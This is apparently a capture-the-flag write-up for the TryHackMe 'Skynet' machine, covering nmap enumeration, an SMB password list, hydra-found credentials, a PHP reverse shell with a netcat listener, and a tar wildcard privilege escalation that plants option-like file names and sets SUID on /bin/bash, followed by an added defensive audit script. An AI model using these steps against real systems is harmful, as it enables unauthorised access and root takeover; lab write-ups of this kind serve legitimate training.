Skynet

Operating system: Linux
Difficulty: Easy
Release date: -
Creator: TryHackme

Reconnaissance

We send an ICMP ping to the target machine to check that we have connectivity.

Initial enumeration

We run an nmap scan to discover which TCP ports are open on the victim machine.

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.19.80                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 14:27 -03
Initiating SYN Stealth Scan at 14:27
Scanning 10.10.19.80 [65535 ports]
Discovered open port 445/tcp on 10.10.19.80
Discovered open port 110/tcp on 10.10.19.80
Discovered open port 139/tcp on 10.10.19.80
Discovered open port 22/tcp on 10.10.19.80
Discovered open port 80/tcp on 10.10.19.80
Discovered open port 143/tcp on 10.10.19.80
Completed SYN Stealth Scan at 14:27, 19.82s elapsed (65535 total ports)
Nmap scan report for 10.10.19.80
Host is up, received user-set (0.24s latency).
Scanned at 2025-03-26 14:27:03 -03 for 20s
Not shown: 58461 closed tcp ports (reset), 7068 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack ttl 63
80/tcp  open  http         syn-ack ttl 63
110/tcp open  pop3         syn-ack ttl 63
139/tcp open  netbios-ssn  syn-ack ttl 63
143/tcp open  imap         syn-ack ttl 63
445/tcp open  microsoft-ds syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 19.91 seconds
           Raw packets sent: 96795 (4.259MB) | Rcvd: 64019 (2.567MB)

We run nmap's basic enumeration scripts to identify the service and version running on each open port.

nmap -sCV -p22,80,110,139,143,445 -oN servicesScan 10.10.19.80
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 14:28 -03
Nmap scan report for 10.10.19.80 (10.10.19.80)
Host is up (0.23s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Skynet
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP AUTH-RESP-CODE CAPA SASL RESP-CODES PIPELINING UIDL
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: IMAP4rev1 LITERAL+ post-login more have OK SASL-IR LOGIN-REFERRALS capabilities Pre-login listed ID IDLE ENABLE LOGINDISABLEDA0001
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-03-26T17:31:03
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2025-03-26T12:31:03-05:00
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 1h42m05s, deviation: 2h53m12s, median: 2m04s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.71 seconds

Initial exploitation

Samba (445)

attention.txt

A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

log1.txt

cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

We carry out a brute-force attack with hydra.

milesdyson:cyborg007haloterminator

We perform web fuzzing and find the administrator path.

PoC

cp /usr/share/webshells/php/php-reverse-shell.php .

We start an HTTP server with Python to serve the reverse shell.

python3 -m http.server 80

We listen with Netcat on port 4444.

nc -lnvp 4444

Privilege escalation

echo -e '#!/bin/bash\nchmod +s /bin/bash' > /var/www/html/root_shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh root_shell.sh"  
touch "/var/www/html/--checkpoint=1"
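
The file names created above only matter if something later runs GNU tar in /var/www/html with a shell wildcard, because names beginning with `--` are then parsed as tar options instead of files. The following is an added example, not part of the original write-up: it lists such option-like names in a directory and archives the directory without a glob. The function names, the MARKER file and the sample directory are constructed for illustration, and the wildcard-based backup job is an assumption, since the page does not show it.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): audit and hardening helpers
# for a directory that a scheduled job archives with tar.

# Print the direct children of a directory whose names begin with '-'.
# A command such as `tar cf backup.tgz *` run inside that directory would
# receive these names as command-line options, not as files to archive.
find_option_like_names() {
    local dir=$1 f
    for f in "$dir"/-*; do
        # If nothing matches, the pattern stays literal and does not exist.
        if [ -e "$f" ]; then
            printf '%s\n' "${f##*/}"
        fi
    done
    return 0
}

# Archive a directory without any glob expansion. tar is given the single
# path '.', so file names inside the directory never reach the command line
# and are stored as ordinary members (./--checkpoint=1, ...).
safe_backup() {
    local dir=$1 out=$2
    tar -czf "$out" -C "$dir" .
}

# Constructed sample input: a web root containing one normal file and two
# option-like names. The action is a harmless `touch MARKER` (hypothetical),
# so a test can tell whether tar ever interpreted the name as an option.
make_sample_dir() {
    local d
    d=$(mktemp -d)
    echo '<html></html>' > "$d/index.html"
    touch "$d/--checkpoint=1"
    touch "$d/--checkpoint-action=exec=touch MARKER"
    printf '%s\n' "$d"
}
```

Running `find_option_like_names` against any directory that a privileged job archives is a quick audit; a non-empty result in a directory writable by the web server user is worth investigating.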

Post-exploitation

We read the root flag.
